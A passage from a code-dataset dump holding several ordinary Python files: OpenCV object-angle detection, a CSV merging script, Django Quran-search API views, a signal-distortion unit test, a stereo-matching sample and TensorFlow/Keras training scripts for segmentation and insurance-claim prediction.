detect_class_names[r_detect['class_ids'][i]] in ['toothpaste','toilet_soap','snow_pear','tea_pi','tang']:\r\n                    #roi_mat=np.ones((480,640,3),dtype=np.uint8)*255\r\n                    frame_copy=np.array(frame)\r\n                    roi_mat=frame_copy[r_detect['rois'][i][0]:r_detect['rois'][i][2],r_detect['rois'][i][1]:r_detect['rois'][i][3],:].copy()\r\n                    #print('1',frame_copy[r_detect['rois'][i][0]:r_detect['rois'][i][2],r_detect['rois'][i][1]:r_detect['rois'][i][3],:])\r\n                    #print('2',roi_mat)\r\n                    edges = cv2.Canny(cv2.cvtColor(roi_mat,cv2.COLOR_BGR2GRAY),100, 255, apertureSize=3)\r\n                    LINES=cv2.HoughLinesP(edges, 1.0, np.pi / 180, 50,1, 30,40)\r\n                    #print(\"number of line segments\",len(LINES))\r\n                    line_lenth=0\r\n                    angle_x1=0\r\n                    angle_x2=0\r\n                    angle_y1=0\r\n                    angle_y2=0\r\n                    if LINES is None:\r\n                        pass\r\n                    else:\r\n                        for line in LINES:\r\n                            for x1,y1,x2,y2 in line:\r\n                                if (x1-x2)*(x1-x2)+(y1-y2)*(y1-y2)>line_lenth:\r\n                                    line_lenth=(x1-x2)*(x1-x2)+(y1-y2)*(y1-y2)\r\n                                    angle_x1=x1\r\n                                    angle_x2=x2\r\n                                    angle_y1=y1\r\n                                    angle_y2=y2\r\n                                    cv2.line(roi_mat,(x1, y1), (x2, y2), (0, 255,0 ), 3)\r\n                    cv2.imshow('roi',roi_mat)\r\n                    cv2.waitKey(10)\r\n                    mat_tmp1=np.array([[[angle_x1,angle_y1]]],dtype='float32')\r\n            \r\n            
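The corner-to-tabletop mapping above is a plain homography: four detected pixel corners define cv2.getPerspectiveTransform onto the 549x549 table view, and a detection's pixel is then pushed through cv2.perspectiveTransform, as coordinate_transform does. A small sketch with hypothetical corner pixels:

```python
import numpy as np
import cv2

# Four hypothetical corner pixels, mapped onto a 549x549 top-down table view.
src = np.array([[100, 100], [500, 100], [100, 380], [500, 380]], dtype=np.float32)
dst = np.array([[0, 0], [549, 0], [0, 549], [549, 549]], dtype=np.float32)
M = cv2.getPerspectiveTransform(src, dst)

# Any image point can now be mapped into table-plane coordinates.
point = np.array([[[320.0, 240.0]]], dtype=np.float32)   # (1, 1, 2), as cv2 expects
mapped = cv2.perspectiveTransform(point, M)
print(mapped[0][0])
```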
true_coordinate1=cv2.perspectiveTransform(mat_tmp1,m)\r\n angle_x1_plane=true_coordinate1[0][0][0]\r\n angle_y1_plane=true_coordinate1[0][0][1]\r\n mat_tmp1=np.array([[[angle_x2,angle_y2]]],dtype='float32')\r\n true_coordinate1=cv2.perspectiveTransform(mat_tmp1,m)\r\n angle_x2_plane=true_coordinate1[0][0][0]\r\n angle_y2_plane=true_coordinate1[0][0][1]\r\n angle=math.atan2(angle_y2_plane-angle_y1_plane,angle_x2_plane-angle_x1_plane)\r\n angle=math.degrees(angle)-3+180\r\n if angle>180:\r\n angle=angle-180\r\n \r\n for each in contour:\r\n if each[0]>y_max:\r\n y_max=each[0]\r\n y=y_max\r\n x1,y1=coordinate_transform(x,y,r_detect['class_ids'][i],m)\r\n print(detect_class_names[r_detect['class_ids'][i]])\r\n print((x1/10,y1/10), angle)\r\n coordinate.append([detect_class_names[r_detect['class_ids'][i]],r_detect['scores'][i],r_detect['rois'][i],[x1,y1,angle]])\r\n #cv2.imshow('result',color_image) \r\n #cv2.waitKey(1000) \r\n #展示最原始的检测信息(可注释)\r\n #visualize.display_instances(image, r_detect['rois'], r_detect['masks'], r_detect['class_ids'],detect_class_names, r_detect['scores'])\r\n count+=1\r\n if count==1:\r\n end=datetime.now()\r\n print('total time:',(end-start).seconds)\r\n image=visualize2.video_display1(color_image,coordinate)\r\n return image\r\n break\r\n \r\n \r\n \r\n ","sub_path":"desk/compitition.py","file_name":"compitition.py","file_ext":"py","file_size_in_byte":12676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"121101950","text":"import csv\nimport copy\n\nwith open(\"y_raw.csv\", 'r') as infile, open(\"Xmat_lang.csv\") as infile1, open(\"desc.csv\") as infile2, open(\"XYmat_lang_desc.csv\", 'w') as outfile:\n\ty_raw = csv.DictReader(infile)\n\tXmat = csv.DictReader(infile1)\n\tdesc_mat = csv.DictReader(infile2)\n\tfieldnames = next(Xmat)\n\txrow = copy.deepcopy(fieldnames)\n\t#print(fieldnames)\n\tfieldnames.pop(\"name\")\n\theader = [\"name\", \"reviews\", \"desc_snippet\"]\n\tfor i in fieldnames:\n\t\theader.append(i)\n\tw = csv.DictWriter(outfile, fieldnames = header)\n\tw.writeheader()\n\ti = 1\n\tj = 1\n\tdesc_row = next(desc_mat)\n\n\tfor row in y_raw:\n\t\t\n\t\tif row[\"reviews\"] != \"NaN\" and len(desc_row[\"desc_snippet\"]) > 0 and desc_row[\"desc_snippet\"] != \"NaN\":\n\t\t\tif i != 1:\n\t\t\t\txrow = next(Xmat)\n\t\t\t\tj += 1\n\t\t\t\twhile(xrow[\"name\"] != desc_row[\"name\"]):\n\t\t\t\t\txrow = next(Xmat)\n\t\t\t\t\tj += 1\n\t\t\txrow[\"reviews\"] = row[\"reviews\"]\n\t\t\txrow[\"desc_snippet\"] = desc_row[\"desc_snippet\"]\n\t\t\tdesc_row = next(desc_mat)\n\t\t\tw.writerow(xrow)\n\t\t\ti += 1\n\t\telse:\n\t\t\ttry:\n\t\t\t\tdesc_row = next(desc_mat)\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t\ti += 1\n\t\tprint(\"j:\", j, \"i:\", i)\n\t\t\t\t\n","sub_path":"Y_lang_desc.py","file_name":"Y_lang_desc.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"444517403","text":"# -*- coding: utf-8 -*-\nfrom django.http import JsonResponse\nfrom rest_framework.decorators import api_view\nfrom .Iqra import Iqra\n\n\n@api_view(['POST'])\ndef getSearchResult(request):\n \"\"\"Returns the result of a search. 
Parameters need to be JSON in the body\n Example: /api/search\n JSON: {\n 'arabicText': u'محمد',\n 'translation': 'en-hilali',\n }\n :param request: REST API request object.\n :type request: rest_framework.request.Request\n :return: JSON response with query text, matches, and suggestions\n :rtype: JsonResponse\n \"\"\"\n data = request.data\n value = data['arabicText']\n if 'translation' in data:\n translation = data['translation']\n else:\n translation = 'en-hilali'\n iqra = Iqra()\n result = iqra.getResult(value, translation)\n result = {'result': result}\n return JsonResponse(result)\n\n\n@api_view(['POST'])\ndef getAyahTranslations(request):\n \"\"\"Returns the translations of an ayah. Parameters need to be JSON in the body\n Example: /api/translations\n JSON: {\n 'ayahs': [Ayahs(surahNum, ayahNum)],\n 'translation': 'en-hilali',\n }\n :param request: REST API request object.\n :type request: rest_framework.request.Request\n :return: JSON response with query text, matches, and suggestions\n :rtype: JsonResponse\n \"\"\"\n data = request.data\n ayahs = data['ayahs']\n if 'translation' in data:\n translation = data['translation']\n else:\n translation = 'en-hilali'\n iqra = Iqra()\n result = iqra.getTranslations(ayahs, translation)\n result = {'result': result}\n return JsonResponse(result)\n","sub_path":"iqra/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"3809630","text":"import unittest\nimport numpy as np\nfrom scipy import signal\n\nimport pycqed.measurement.kernel_functions_ZI as ZI_kf\n\nclass Test_Kernel_functions_ZI(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n self.time_start = -100e-9\n self.time_end = 100e-9\n self.sampling_rate = 2.4e9\n self.time = np.arange(self.time_start, self.time_end, 1/self.sampling_rate)\n self.bounce_delay = 10e-9\n self.bounce_amp = 0.1\n self.sawtooth_period = 50e-9\n\n self.generate_test_waveform(self)\n self.compute_distorted_waveform(self)\n\n def generate_test_waveform(self):\n # Sawtooth test waveform\n self.ideal_waveform = np.remainder(2*self.time/self.sawtooth_period, 1)\n\n def compute_distorted_waveform(self):\n a = ZI_kf.first_order_bounce_kern(self.bounce_delay, self.bounce_amp, self.sampling_rate)\n self.distorted_waveform = signal.lfilter([1.0], a, self.ideal_waveform)\n\n def test_first_order_bounce_correction(self):\n hw_corr = ZI_kf.first_order_bounce_corr(self.distorted_waveform, self.bounce_delay, self.bounce_amp, self.sampling_rate)\n b = ZI_kf.first_order_bounce_kern(self.bounce_delay, ZI_kf.coef_round(self.bounce_amp, force_bshift=0), self.sampling_rate)\n first_order_corr = signal.lfilter(b, 1.0, self.distorted_waveform)\n np.testing.assert_almost_equal(hw_corr, first_order_corr, 6)\n\n def test_ideal_bounce_correction(self):\n # Construct impulse response\n impulse = np.zeros(len(self.time))\n zero_ind = np.argmin(np.abs(self.time))\n impulse[zero_ind] = 1.0\n a = ZI_kf.first_order_bounce_kern(self.bounce_delay, self.bounce_amp, self.sampling_rate)\n impulse_response = signal.lfilter([1.0], a, impulse)\n b_inv = ZI_kf.ideal_inverted_fir_kernel(impulse_response, zero_ind)\n ideal_corr = signal.lfilter(b_inv, 1.0, self.distorted_waveform)\n np.testing.assert_almost_equal(ideal_corr, self.ideal_waveform, 
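The test above builds a bounce distortion as an IIR filter and checks that an inverted kernel recovers the waveform. The underlying identity is easy to see in isolation: a filter with numerator 1 and denominator a is undone exactly by the filter with numerator a, which the FIR inversion approximates. A sketch with a paraphrased bounce kernel (an assumption, not the pycqed implementation):

```python
import numpy as np
from scipy import signal

fs, delay, amp = 2.4e9, 10e-9, 0.1
a = np.zeros(int(round(delay * fs)) + 1)
a[0], a[-1] = 1.0, amp                    # bounce model: y[n] + amp*y[n-k] = x[n]

x = np.sin(2 * np.pi * 20e6 * np.arange(480) / fs)
distorted = signal.lfilter([1.0], a, x)
recovered = signal.lfilter(a, [1.0], distorted)   # exact inverse of the pure-IIR filter
print(np.allclose(recovered, x))
```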
6)\n\n","sub_path":"pycqed/tests/test_kernel_distortions_ZI.py","file_name":"test_kernel_distortions_ZI.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"253010434","text":"#!/usr/bin/env python3\n\nimport sys\n\nimport cv2\nimport numpy as np\n\nimport pysgm\n\ndisp_size = 128\n\nI1 = cv2.imread(sys.argv[1], cv2.IMREAD_GRAYSCALE)\nI2 = cv2.imread(sys.argv[2], cv2.IMREAD_GRAYSCALE)\n\ndisp = np.zeros_like(I2)\n\nI1_ptr, _ = I1.__array_interface__['data']\nI2_ptr, _ = I2.__array_interface__['data']\ndisp_ptr, _ = disp.__array_interface__['data']\n\nheight, width = I1.shape\n\nparams = pysgm.StereoSGM.Parameters(P1=int(10), P2=int(120), uniqueness=np.float32(0.95), subpixel=False,\n PathType=pysgm.PathType.SCAN_8PATH, min_disp=int(0), LR_max_diff=int(1))\n\nsgm = pysgm.StereoSGM(width=width, height=height, disparity_size=int(disp_size), input_depth_bits=int(8),\n output_depth_bits=int(8), inout_type=pysgm.EXECUTE_INOUT.EXECUTE_INOUT_HOST2HOST,\n param=params)\n\nsgm.execute(I1_ptr, I2_ptr, disp_ptr)\n\nmask = disp == np.uint8(sgm.get_invalid_disparity())\ndisp = (255. * disp / disp_size)\n\ndisp_color = cv2.applyColorMap(disp.astype(\"uint8\"), cv2.COLORMAP_JET)\ndisp_color[mask] = 0\n\ncv2.imshow(\"disp_color\", disp_color)\ncv2.waitKey(0)\n","sub_path":"sample/pysgm/pysgm_test_raw.py","file_name":"pysgm_test_raw.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"45319887","text":"import tensorflow as tf\nimport numpy as np\nimport os\nfrom time import time\nfrom data_utils import save_image, load_data, zero_mean_batch, batch_class_weights\nfrom segnet import segnet\nfrom functions import sparse_weighted_cost, sparse_unweighted_cost, pixel_wise_softmax\n\n\ncurrent_dir = os.getcwd()\nnum_classes = 2\nlearning_rate = 1e-3\nepochs = 20\nbatch_size = 8\nnum_batches = 636\nnum_channels = 3\n\n\nX = tf.placeholder(tf.float32, shape=(batch_size, 256, 256, num_channels), name=\"myInput\")\nsparse_label = tf.placeholder(tf.int32, shape=(batch_size, 256, 256), name=\"myOutput\")\nclass_weights = tf.placeholder(tf.float32, shape=(num_classes), name=\"class_weights\")\n\nglobal_step = tf.Variable(0, name='global_step', trainable=False)\n\nlogits = segnet(X, num_classes)\n# unweighted_cost = sparse_unweighted_cost(logits, sparse_label, num_classes)\n# weighted_cost = sparse_weighted_cost(logits, sparse_label, class_weights, num_classes)\n\n\nsumm1 = tf.summary.scalar('unweighted_cost', sparse_unweighted_cost(logits, sparse_label, num_classes))\nsumm2 = tf.summary.scalar('weighted_cost', sparse_weighted_cost(logits, sparse_label, class_weights, num_classes))\n\nlearning_rate_node = tf.train.exponential_decay(\n learning_rate=learning_rate,\n global_step=global_step, decay_steps=1000,\n decay_rate=0.95, staircase=True)\n\noptimizer = tf.train.GradientDescentOptimizer(\n learning_rate=learning_rate_node).minimize(sparse_weighted_cost(logits, sparse_label, class_weights, num_classes))\n\nsumm = tf.summary.merge_all()\n\n\n## some debug help\nprint(X)\nprint(sparse_label)\nprint(logits)\nprint(predicted_image)\nprint(tf.trainable_variables())\n\n## weights to restore should be assigned to a python variable\nwith tf.variable_scope('segnet', reuse=tf.AUTO_REUSE):\n b1 = tf.get_variable(\"conv1/conv1_1/biases\")\n W1 = tf.get_variable(\"conv1/conv1_1/weights\")\n b2 = tf.get_variable(\"conv1/conv1_2/biases\")\n W2 
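sparse_weighted_cost is imported from this repo's functions module, so its body is not shown; a plausible reading (an assumption, not the repository's code) is per-pixel softmax cross-entropy scaled by each pixel's class weight:

```python
import tensorflow as tf

# Hypothetical reconstruction of the weighted cost used above.
def sparse_weighted_cost(logits, sparse_label, class_weights, num_classes):
    # per-pixel cross-entropy, shape (batch, H, W); num_classes kept only
    # to match the call sites in the training script
    ce = tf.nn.sparse_softmax_cross_entropy_with_logits(
        labels=sparse_label, logits=logits)
    # look up each pixel's class weight and rescale its loss
    pixel_weights = tf.gather(class_weights, sparse_label)
    return tf.reduce_mean(ce * pixel_weights)
```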
= tf.get_variable(\"conv1/conv1_2/weights\")\n b3 = tf.get_variable(\"conv2/conv2_1/biases\")\n W3 = tf.get_variable(\"conv2/conv2_1/weights\")\n b4 = tf.get_variable(\"conv2/conv2_2/biases\")\n W4 = tf.get_variable(\"conv2/conv2_2/weights\")\n b5 = tf.get_variable(\"conv3/conv3_1/biases\")\n W5 = tf.get_variable(\"conv3/conv3_1/weights\")\n b6 = tf.get_variable(\"conv3/conv3_2/biases\")\n W6 = tf.get_variable(\"conv3/conv3_2/weights\")\n b7 = tf.get_variable(\"conv3/conv3_3/biases\")\n W7 = tf.get_variable(\"conv3/conv3_3/weights\")\n b8 = tf.get_variable(\"conv4/conv4_1/biases\")\n W8 = tf.get_variable(\"conv4/conv4_1/weights\")\n b9 = tf.get_variable(\"conv4/conv4_2/biases\")\n W9 = tf.get_variable(\"conv4/conv4_2/weights\")\n b10 = tf.get_variable(\"conv4/conv4_3/biases\")\n W10 = tf.get_variable(\"conv4/conv4_3/weights\")\n b11 = tf.get_variable(\"conv5/conv5_1/biases\")\n W11 = tf.get_variable(\"conv5/conv5_1/weights\")\n b12 = tf.get_variable(\"conv5/conv5_2/biases\")\n W12 = tf.get_variable(\"conv5/conv5_2/weights\")\n b13 = tf.get_variable(\"conv5/conv5_3/biases\")\n W13 = tf.get_variable(\"conv5/conv5_3/weights\")\n\n\nwith tf.Session() as sess:\n writer = tf.summary.FileWriter('./log/summary/', sess.graph)\n restorer = tf.train.Saver({\"vgg_16/conv1/conv1_1/biases\": b1,\n \"vgg_16/conv1/conv1_1/weights\": W1,\n \"vgg_16/conv1/conv1_2/biases\": b2,\n \"vgg_16/conv1/conv1_2/weights\": W2,\n \"vgg_16/conv2/conv2_1/biases\": b3,\n \"vgg_16/conv2/conv2_1/weights\": W3,\n \"vgg_16/conv2/conv2_2/biases\": b4,\n \"vgg_16/conv2/conv2_2/weights\": W4,\n \"vgg_16/conv3/conv3_1/biases\": b5,\n \"vgg_16/conv3/conv3_1/weights\": W5,\n \"vgg_16/conv3/conv3_2/biases\": b6,\n \"vgg_16/conv3/conv3_2/weights\": W6,\n \"vgg_16/conv3/conv3_3/biases\": b7,\n \"vgg_16/conv3/conv3_3/weights\": W7,\n \"vgg_16/conv4/conv4_1/biases\": b8,\n \"vgg_16/conv4/conv4_1/weights\": W8,\n \"vgg_16/conv4/conv4_2/biases\": b9,\n \"vgg_16/conv4/conv4_2/weights\": W9,\n \"vgg_16/conv4/conv4_3/biases\": b10,\n \"vgg_16/conv4/conv4_3/weights\": W10,\n \"vgg_16/conv5/conv5_1/biases\": b11,\n \"vgg_16/conv5/conv5_1/weights\": W11,\n \"vgg_16/conv5/conv5_2/biases\": b12,\n \"vgg_16/conv5/conv5_2/weights\": W12,\n \"vgg_16/conv5/conv5_3/biases\": b13,\n \"vgg_16/conv5/conv5_3/weights\": W13})\n sess.run(tf.global_variables_initializer())\n restorer.restore(sess, \"./vgg/vgg_16.ckpt\")\n\n saver = tf.train.Saver()\n\n counter = 0\n\n for e in range(epochs):\n start_time = time()\n\n for bn in range(num_batches):\n # Load batch data using data_utils\n x_train, y_train = load_data(\"./d/Carvana\", bn)\n\n # Zero mean the batch\n x_train = x_train/255\n x_train = zero_mean_batch(x_train)\n\n # Check shapes & save images when doing test run\n if bn == 0:\n print(f\"shape of x_train is = {x_train.shape}\")\n print(f\"shape of y_train is = {y_train.shape}\")\n for name_count, image in enumerate(x_train):\n # print(image.shape)\n save_image(image=image, name=f\"image_batch1_{name_count}.png\")\n\n # Calculate class weights in a batch\n c_weights = batch_class_weights(y_train, num_classes)\n\n logit, _ = sess.run([logits, optimizer],\n feed_dict={X: x_train,\n sparse_label: y_train,\n class_weights: c_weights})\n\n summary = sess.run(summ, feed_dict={X: x_train,\n sparse_label: y_train,\n class_weights: c_weights})\n writer.add_summary(summary, counter)\n\n # if bn % 10 == 0:\n # # print(image.shape)\n # save_image(f\"./predicted_images/image_e{e}_bn{bn}_{i}.png\", image)\n\n counter += 1\n\n end_time = time()\n save_path = 
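The hand-written Saver dictionary above maps every checkpoint name under vgg_16/ to the matching variable under the segnet scope. Here is the pattern in isolation, for a single conv layer with its real VGG shapes (the loop over all thirteen layers is left out):

```python
import tensorflow as tf

# Variables live under "segnet", checkpoint names live under "vgg_16".
with tf.variable_scope('segnet', reuse=tf.AUTO_REUSE):
    w = tf.get_variable('conv1/conv1_1/weights', shape=[3, 3, 3, 64])
    b = tf.get_variable('conv1/conv1_1/biases', shape=[64])

restorer = tf.train.Saver({'vgg_16/conv1/conv1_1/weights': w,
                           'vgg_16/conv1/conv1_1/biases': b})
# restorer.restore(sess, './vgg/vgg_16.ckpt')  # inside a session, as above
```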
saver.save(sess, \"./models/model.ckpt\")\n duration = end_time - start_time\n print(f\"epoch no. {e} : done in {duration} sec\")\n\n writer.close()\n","sub_path":"SegNet/segnet_trainbatch.py","file_name":"segnet_trainbatch.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"219802823","text":"\n# coding: utf-8\n\n# https://www.kaggle.com/tilii7/keras-averaging-runs-gini-early-stopping\n\n\nfrom utils import utils, gini\nimport time\nfrom constants import *\nimport os\nimport gc\n\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import roc_auc_score, log_loss\nfrom sklearn.model_selection import StratifiedKFold\n\nfrom keras.models import load_model, Sequential\nfrom keras.models import Sequential, Model\nfrom keras.layers import Input, Dense, Dropout, Activation, Reshape, Concatenate, Merge\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, Callback, CSVLogger\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.optimizers import SGD\nfrom keras.layers.embeddings import Embedding\n\nfrom tensorflow import set_random_seed\nset_random_seed(88)\n\n\n\nnp.random.seed(88) # for reproducibility\nMODEL_NAME = 'keras_joe'\nSEED = 88\n\ncombined = utils.load_data()\n# combined = utils.bojan_engineer(combined)\n# combined = utils.drop_stupid(combined)\n# combined = utils.engineer_stats(combined)\n# combined = utils.recon_category(combined)\n# combined = utils.cat_transform(combined, 'onehot')\n# combined = utils.data_transform(combined, self.data_transform)\n# combined = utils.feature_interactions(combined)\ntrain, test = utils.recover_train_test_na(combined, fillna=False)\n\n\n# Fillna for minmax scaler\ntrain = train.replace(np.NaN, -1)\ntest = test.replace(np.NaN, -1)\n\nX_train = train.drop('target', axis=1)\ny_train = train.target\nX_test = test\n\ncols_use = [c for c in X_train.columns if (not c.startswith('ps_calc_'))]\n\nX_train = X_train[cols_use]\nX_test = X_test[cols_use]\n\ncol_vals_dict = {c: list(X_train[c].unique()) for c in X_train.columns if c.endswith('_cat')}\n\nembed_cols = []\nfor c in col_vals_dict:\n if len(col_vals_dict[c])>2:\n embed_cols.append(c)\n print(c + ': %d values' % len(col_vals_dict[c])) #look at value counts to know the embedding dimensions\n\nprint('\\n')\n\nclass gini_callback(Callback):\n def __init__(self, training_data, validation_data):\n self.X_tr = training_data[0]\n self.y_tr = training_data[1]\n self.X_val = validation_data[0]\n self.y_val = validation_data[1]\n self.best_lap = 0\n\n def on_train_begin(self, logs={}):\n return\n\n def on_train_end(self, logs={}):\n return\n\n def on_epoch_begin(self, epoch, logs={}):\n return\n\n def on_epoch_end(self, epoch, logs={}):\n y_pred_tr = self.model.predict_proba(self.X_tr)\n logs['gini_tr'] = gini.gini_sklearn(self.y_tr, y_pred_tr)\n y_pred_val = self.model.predict_proba(self.X_val)\n logs['gini_val'] = gini.gini_sklearn(self.y_val, y_pred_val)\n\n # if logs['gini_val'] > self.best_lap:\n # self.best_lap = logs['gini_val']\n\n # global pred_val, pred_test\n # pred_val = y_pred_val\n # pred_test = self.model.predict_proba(X_test)\n\n print('Gini Score in training set: {}, test set: {}'.format(logs['gini_tr'], logs['gini_val']))\n return\n\n def on_batch_begin(self, batch, logs={}):\n return\n\n def on_batch_end(self, batch, logs={}):\n return\n\n\ndef 
preproc(X_train, X_val, X_test):\n\n input_list_train = []\n input_list_val = []\n input_list_test = []\n\n #the cols to be embedded: rescaling to range [0, # values)\n for c in embed_cols:\n raw_vals = np.unique(X_train[c])\n val_map = {}\n for i in range(len(raw_vals)):\n val_map[raw_vals[i]] = i\n input_list_train.append(X_train[c].map(val_map).values)\n input_list_val.append(X_val[c].map(val_map).fillna(0).values)\n input_list_test.append(X_test[c].map(val_map).fillna(0).values)\n\n #the rest of the columns\n other_cols = [c for c in X_train.columns if (not c in embed_cols)]\n input_list_train.append(X_train[other_cols].values)\n input_list_val.append(X_val[other_cols].values)\n input_list_test.append(X_test[other_cols].values)\n\n return input_list_train, input_list_val, input_list_test\n\n\ndef create_model():\n models = []\n\n model_ps_ind_02_cat = Sequential()\n model_ps_ind_02_cat.add(Embedding(5, 3, input_length=1))\n model_ps_ind_02_cat.add(Reshape(target_shape=(3,)))\n models.append(model_ps_ind_02_cat)\n\n model_ps_ind_04_cat = Sequential()\n model_ps_ind_04_cat.add(Embedding(3, 2, input_length=1))\n model_ps_ind_04_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_ind_04_cat)\n\n model_ps_ind_05_cat = Sequential()\n model_ps_ind_05_cat.add(Embedding(8, 5, input_length=1))\n model_ps_ind_05_cat.add(Reshape(target_shape=(5,)))\n models.append(model_ps_ind_05_cat)\n\n model_ps_car_01_cat = Sequential()\n model_ps_car_01_cat.add(Embedding(13, 7, input_length=1))\n model_ps_car_01_cat.add(Reshape(target_shape=(7,)))\n models.append(model_ps_car_01_cat)\n\n model_ps_car_02_cat = Sequential()\n model_ps_car_02_cat.add(Embedding(3, 2, input_length=1))\n model_ps_car_02_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_car_02_cat)\n\n model_ps_car_03_cat = Sequential()\n model_ps_car_03_cat.add(Embedding(3, 2, input_length=1))\n model_ps_car_03_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_car_03_cat)\n\n model_ps_car_04_cat = Sequential()\n model_ps_car_04_cat.add(Embedding(10, 5, input_length=1))\n model_ps_car_04_cat.add(Reshape(target_shape=(5,)))\n models.append(model_ps_car_04_cat)\n\n model_ps_car_05_cat = Sequential()\n model_ps_car_05_cat.add(Embedding(3, 2, input_length=1))\n model_ps_car_05_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_car_05_cat)\n\n model_ps_car_06_cat = Sequential()\n model_ps_car_06_cat.add(Embedding(18, 8, input_length=1))\n model_ps_car_06_cat.add(Reshape(target_shape=(8,)))\n models.append(model_ps_car_06_cat)\n\n model_ps_car_07_cat = Sequential()\n model_ps_car_07_cat.add(Embedding(3, 2, input_length=1))\n model_ps_car_07_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_car_07_cat)\n\n model_ps_car_09_cat = Sequential()\n model_ps_car_09_cat.add(Embedding(6, 3, input_length=1))\n model_ps_car_09_cat.add(Reshape(target_shape=(3,)))\n models.append(model_ps_car_09_cat)\n\n model_ps_car_10_cat = Sequential()\n model_ps_car_10_cat.add(Embedding(3, 2, input_length=1))\n model_ps_car_10_cat.add(Reshape(target_shape=(2,)))\n models.append(model_ps_car_10_cat)\n\n model_ps_car_11_cat = Sequential()\n model_ps_car_11_cat.add(Embedding(104, 10, input_length=1))\n model_ps_car_11_cat.add(Reshape(target_shape=(10,)))\n models.append(model_ps_car_11_cat)\n\n model_rest = Sequential()\n model_rest.add(Dense(16, input_dim=24))\n models.append(model_rest)\n\n model = Sequential()\n model.add(Merge(models, mode='concat'))\n model.add(Dense(80))\n model.add(Activation('relu'))\n 
model.add(Dropout(.35))\n model.add(Dense(20))\n model.add(Activation('relu'))\n model.add(Dropout(.15))\n model.add(Dense(10))\n model.add(Activation('relu'))\n model.add(Dropout(.15))\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n\n model.compile(loss='binary_crossentropy', optimizer='adam')\n\n return model\n\n\n\n\nepochs = 1024\nbatch_size = 4096\npatience = 10\nKFOLDS = 5\nruns_per_fold = 3\n\n\ntmp = time.time()\n# shuffle=True is required for random_state to actually control the fold assignment\nskf = StratifiedKFold(n_splits=KFOLDS, shuffle=True, random_state=SEED)\nscores = []\noof_train = np.zeros((X_train.shape[0],1))\noof_test = np.zeros((X_test.shape[0],1))\n\n\nfor i, (train_index, val_index) in enumerate(skf.split(X_train, y_train)):\n assert len(X_train) == len(y_train)\n\n score_fold = []\n\n print('\\n')\n\n print('[Fold {}/{} START]'.format(i + 1, KFOLDS))\n\n X_tr, X_val = X_train.iloc[train_index,:], X_train.iloc[val_index,:]\n y_tr, y_val = y_train[train_index], y_train[val_index]\n\n #upsampling adapted from kernel:\n #https://www.kaggle.com/ogrellier/xgb-classifier-upsampling-lb-0-283\n pos = (pd.Series(y_tr == 1))\n\n # Add positive examples\n X_tr = pd.concat([X_tr, X_tr.loc[pos]], axis=0)\n y_tr = pd.concat([y_tr, y_tr.loc[pos]], axis=0)\n\n # Shuffle data\n idx = np.arange(len(X_tr))\n np.random.shuffle(idx)\n X_tr = X_tr.iloc[idx]\n y_tr = y_tr.iloc[idx]\n\n #preprocessing\n X_tr, X_val, X_test = preproc(X_tr, X_val, test)\n\n # accumulates the run-averaged test predictions for this fold; initialising\n # this inside the run loop would discard all but the last run\n pred_test = np.zeros_like(oof_test)\n\n for j in range(runs_per_fold):\n print('Starting run {}'.format(j+1))\n\n log_path = os.path.join(LOG_PATH, MODEL_NAME + '_log.csv')\n checkpoint_path = os.path.join(LOG_PATH, MODEL_NAME + '_check.check'.format(j))\n\n callbacks = [\n gini_callback(training_data=(X_tr, y_tr), validation_data=(X_val, y_val)),\n EarlyStopping(monitor='gini_val', patience=patience, mode='max', verbose=1),\n CSVLogger(log_path, separator=',', append=False),\n ModelCheckpoint(checkpoint_path, monitor='gini_val', mode='max', save_best_only=True, save_weights_only=True, verbose=1)\n ]\n\n model = create_model()\n\n\n model.fit(X_tr, y_tr, shuffle=False, batch_size=batch_size, epochs=epochs, verbose=2, callbacks=callbacks)\n\n # delete current model\n del model\n\n # load best model of each run\n model = create_model()\n model.load_weights(checkpoint_path, by_name=False)\n\n # For train and valid only\n pred_val = model.predict_proba(X_val)\n oof_train[val_index] += pred_val / runs_per_fold\n\n # Store average score for evaluate model\n score_fold.append(gini.gini_sklearn(y_val, pred_val))\n\n print('Run {}: {}'.format(j+1, score_fold[j]))\n\n pred_test_lap = model.predict_proba(X_test)\n pred_test += pred_test_lap / runs_per_fold\n\n # Store test predictions for submissions\n\n oof_test += pred_test / KFOLDS\n\n scores.append(np.mean(score_fold))\n print('[Fold {}/{} Gini score: {}]'.format(i+1, KFOLDS, scores[i]))\n\n gc.collect()\n print('[Fold {}/{} END]'.format(i+1, KFOLDS))\n\nprint('Average score: {}'.format(np.mean(scores)))\nprint('Total run time: {} seconds'.format(time.time() - tmp))\n\n# Export oof_train\nfile_path = os.path.join(OOF_PATH, MODEL_NAME + '_train.csv')\npd.DataFrame({MODEL_NAME: oof_train.reshape(-1, )}).to_csv(file_path, index=False)\n# np.savetxt(file_path, oof_train.reshape(-1, 1), delimiter=',', fmt='%.5f')\n\n# Export oof_test\nfile_path = os.path.join(OOF_PATH, MODEL_NAME + '_test.csv')\npd.DataFrame({MODEL_NAME: oof_test.reshape(-1, )}).to_csv(file_path, index=False)\n# np.savetxt(file_path, oof_test.reshape(-1, 1), delimiter=',', 
